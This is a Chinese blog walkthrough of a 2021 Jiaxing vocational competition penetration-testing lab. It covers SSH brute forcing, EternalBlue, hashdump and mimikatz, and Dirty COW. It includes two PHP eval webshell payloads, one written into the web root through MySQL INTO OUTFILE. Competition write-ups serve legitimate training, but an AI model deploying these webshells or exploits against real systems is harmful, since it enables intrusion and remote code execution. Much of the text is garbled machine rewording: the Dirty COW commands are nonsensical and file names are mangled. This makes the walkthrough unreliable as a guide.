Advertisement

2021全国职业技能大赛浙江省嘉兴市“网络空间安全赛项”赛题及赛题解析(超详细)

阅读量:

2021年中职组浙江省嘉兴市“网络空间安全”赛项

    • 一.2021嘉兴市竞赛任务书
    • 二.2021嘉兴市任务书解析
    • 三.不懂的可以私信博主!

一.2021嘉兴市竞赛任务书

一、竞赛时间
9:00—12:00 共计3小时
二、竞赛阶段
竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值
第①阶段:
单兵模式系统渗透测试
任务一:
SSH弱口令渗透测试
任务二:
服务器内部信息获取
任务三:
Windows操作系统渗透测试
任务四:
Linux操作系统渗透测试
任务五:
综合渗透测试

备战阶段 休息20分钟
第②阶段:
分组对抗 系统加固 15分钟
渗透测试 45分钟
三、竞赛任务书内容
(一)拓扑图

在这里插入图片描述

任务一:SSH弱口令渗透测试

任务二:服务器内部信息获取

任务三:Windows操作系统渗透测试

在本地计算机上利用Kali渗透测试平台执行针对服务器场景的系统服务及版本号扫描测试,并将此次扫描所得服务版本号字符串作为关键指标提交;

任务四:Linux操作系统渗透测试

任务五:综合渗透测试

二.2021嘉兴市任务书解析

任务一:
1.根据他题目我们直接可以得到命令 -p 21,22,23

在这里插入图片描述
  1. SSH服务端口信息对应 22/tcp配置参数
    3. 调用辅助性扫描工具模块 use auxiliary/scanner/ssh/ssh_login 执行SSH协议攻击
    4. 指定关键配置参数 set RHOSTS,PASS_FILE,THREADS,USERNAME
在这里插入图片描述

5. set RHOSTS 设置目标主机
6. exploit 运行

在这里插入图片描述

7.知道密码以后ssh连接目标靶机

在这里插入图片描述

任务二:
使用nmap 工具扫描 nmap -sS

在这里插入图片描述

任务三:
1.nmap -sV 扫描版本号

在这里插入图片描述

配置永恒之蓝功能模块后,请确保正确配置相关参数及payload信息,并在系统响应成功后自动触发后续渗透流程。请按照操作指南中的步骤依次进行漏洞利用操作。

在这里插入图片描述
在这里插入图片描述

启动getgui并指定参数运行以开启3389服务随后通过hashdump命令提取明文信息在尝试利用彩虹表进行密码破解时遇到了困难(感到有些无奈)。于是建议采用mimikatz工具先对其加载程序进行操作以获取相关的kerberos信息直接解密出来比较便捷而且更为高效实用。

在这里插入图片描述

rdesktop 直接连接目标靶机 然后下面所有的题目都可以做了。

在这里插入图片描述
在这里插入图片描述

任务四:
1.使用nmap -sV 扫码看开了什么端口

在这里插入图片描述

2.思路①:暴力破解数据库密码

在这里插入图片描述
在这里插入图片描述

随后登录数据库并尝试上传一条短木马。
select '<?php @eval($_POST[“cmd”])?>' into outfile '/var/www/html/log.php';
注释中提到的log.php文件名称可任意选择。

在这里插入图片描述
在这里插入图片描述

然后后面的题目都可以做了。

任务五:
先使用工具扫一下这个网站有什么后台 使用nikto -h 172.16.5.22

在这里插入图片描述
在这里插入图片描述

我们发现了以下两个文件:robots.txt$admin.php$. 其中, 该网站的后台程序用于管理网站.

在这里插入图片描述

对于后台页面而言,我们可以先尝试利用BP进行暴力破解 attacks或者直接访问 SQL 数据库进行漏洞分析。然而对于这种后端系统而言,在确认配置后我们仍然建议尝试使用较弱的密码组合。例如,在配置中设置账号为 admin ,密码则为 ******* ,这样可以直接进入系统进行测试。

在这里插入图片描述

登陆后台,门户–>模块管理–>调用管理–>添加模块,新增模块–>选择自定义html

在这里插入图片描述

手动获取所需代码 后提取所需的URL信息 进入该路径后删除多余的部分即可运行phpinfo()函数。
此处分两种情况 若使用外部编码资源 则需先解析其JSON数据;若直接访问指定URL 并删除其中多余的JSON片段 同样能成功运行phpinfo()

在这里插入图片描述
在这里插入图片描述

getshell脚本:在本地存储了一个简短的密码字符串(其连接密码设置为'cmd')。建议使用'菜刀'或'蚁剑'作为连接工具。

复制代码
    `<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>");?>`
    
    
      
    
    AI助手
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

接下来需要进行的是对系统进行权限提升(脏牛提权)的过程。首先需要执行的是通过SSH连接到系统中的admin用户,并确保该用户的密码强度较为简单。随后按照指定路径./bin/sh -c 'echo "clean cow"' ./runCow.sh 并执行/./bin/sh -c 'echo "clean cow"' ./runCow.sh 以启动相关服务。此外,在之前的步骤中已经确认过该程序处于未运行状态,并在本次操作后显示已成功启动的状态。

在这里插入图片描述

现在的权限直接可以查看etc/passwd了 ,用户id为69的是wcsa用户

在这里插入图片描述

最后一题切换一下用户 就是运行脏牛可以重置密码 然后登入即可。

在这里插入图片描述

三.不懂的可以私信博主!

如对环境或题目有任何疑问,请随时私信博主交流;若存在疑惑的具体问题也可直接提出。感谢大家的喜爱与支持!创作不易!若能获得您的支持与认可,则不胜感激!如需进一步了解或有任何问题,请随时联系我。

全部评论 (0)

还没有任何评论哟~